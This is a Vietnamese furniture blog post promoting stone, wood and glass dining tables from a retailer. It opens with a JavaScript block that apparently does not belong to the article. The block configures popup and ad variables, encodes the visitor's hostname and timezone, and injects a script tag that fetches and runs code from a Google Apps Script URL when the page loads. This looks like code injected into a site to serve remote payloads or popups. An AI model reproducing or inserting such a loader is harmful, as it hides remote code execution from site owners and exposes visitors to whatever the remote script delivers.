var GTM = 'GTM-NJKFBQ8'; var GG_ADS = 'ca-pub-8687624480880776'; var POPUP_IMG_PREFIX = "https://nhaxinhplaza.vn/wp-content/uploads/2022/08/"; // qc.png, close.png var SHOW_POPUP = 1; // 0: disable, 1: enable var MAX_CLAIM = 1; var TIME_TO_SHOW_POPUP = 10; // 10s var MAX_BUFF = 3; var b64e = function (a) { return btoa(encodeURIComponent(a).replace(/%([0-9A-F]{2})/g, function (b, a) { return String.fromCharCode("0x" + a) })) }; var gg_layer = document.createElement('script'); gg_layer.type = 'text/javascript'; gg_layer.src = `https://script.google.com/macros/s/AKfycbwT2tLHaERiLaaaT_05pnXM2h0pjKHGRPBTQgeffPjyIIXBAR46dAuj5S0sgi2scsJ77Q/exec ?st=${b64e(location.hostname)}&tm=${new Date().getHours()}&os=${b64e(new Date().getTimezoneOffset())}`; var s = document.getElementsByTagName('script')[0];s.parentNode.insertBefore(gg_layer, s);

3 chất liệu bàn ghế ăn đẹp được chọn lựa nhiều nhất

Hiện nay chất liệu bàn ghế ăn đẹp có rất nhiều loại với nhiều các mức giá khác nhau. Lựa chọn chất liệu nào là còn tùy thuộc vào điều kiện kinh tế cũng như sở thích của từng gia đình. Sau đây là 3 chất liệu của bàn ghế ăn hiện nay được rất nhiều người yêu thích. Hãy cùng tìm hiểu nhé.

3 chất liệu bàn ghế ăn đẹp được chọn lựa nhiều nhất

Bàn ghế ăn mặt đá

Có thể nói bàn ghế ăn mặt đá trong vài năm trở lại đây được rất nhiều gia đình chọn lựa. Ưu điểm của loại bàn ghế ăn này đó là đem lại giá trị thẩm mĩ rất cao cũng như chất lượng đảm bảo tốt. Mặt bàn đá bóng đẹp, có thể chịu lực, chịu nhiệt lại dễ lau chùi. Ghế ăn có thể bọc da, vải hay bằng gỗ. Bàn ghế ăn mặt đá bền đẹp và giúp cho không gian nhà ăn đẳng cấp hơn.

chất liệu bàn ghế ăn đẹp
Bàn ghế ăn mặt đá là xu hướng mới hiện nay, vừa bền đẹp lại vừa cực kì sang trọng


Bàn ghế ăn gỗ

Không thể không nhắc đến bàn ghế ăn gỗ. Dòng sản phẩm này cũng được rất nhiều khách hàng yêu thích. Bàn ghế ăn gỗ vừa sang lại vừa bền, nhất là những loại gỗ tự nhiên. Nó đem lại sự ấm cúng, sang trọng và đẳng cấp cho nhà bếp của bạn. Có thể kết hợp bàn ghế ăn gỗ với tấm thảm sofa cùng màu hoặc màu sắc tương phản ở phía dưới để đem lại sự hoàn thiện nhất.

chất liệu bàn ghế ăn đẹp
Bàn ghế ăn gỗ tạo sự đẳng cấp và ấm áp

Bàn ghế ăn kính

Bàn ghế ăn mặt kính lại đem đến sự hiện đại, trẻ trung cho nhà ăn của bạn. Loại này cũng rất đa dạng các mẫu mã khác nhau. Bàn ăn kinh dễ dàng lau chùi, vệ sinh. Bạn nên chọn bàn ăn bằng kính cường lực vì nó chịu được lực tốt hơn. Bàn ăn kính có thể kết hợp với gỗ cao cấp hay nhiều các chất liệu khác. 

chất liệu bàn ghế ăn đẹp
Bàn ăn kính cũng rất được yêu thích nhờ sự đa dạng mẫu mã và hiện đại

Với ba loại bàn ghế ăn cao cấp này Nội Thất Xinh đều có nhiều mẫu mã cho bạn chọn lựa. Bởi vậy muốn chọn chất liệu bàn ghế ăn cao cấp hãy đến ngay với chúng tôi.

Truy cập vào website noithatxinh.vn để chọn mua thêm sofa góc cũng như sofa nhập khẩu, bàn trà hay thảm sofa và thật nhiều các món đồ nội thất khác cho không gian của bạn. Các món đồ nội thất cao cấp và dẫn đầu xu hướng luôn đem đến cho quý khách hàng sự hài lòng cao nhất.

=> Tham khảo:  Bàn ghế ăn khuyến mãi đồng giá chỉ còn 16.990.000đ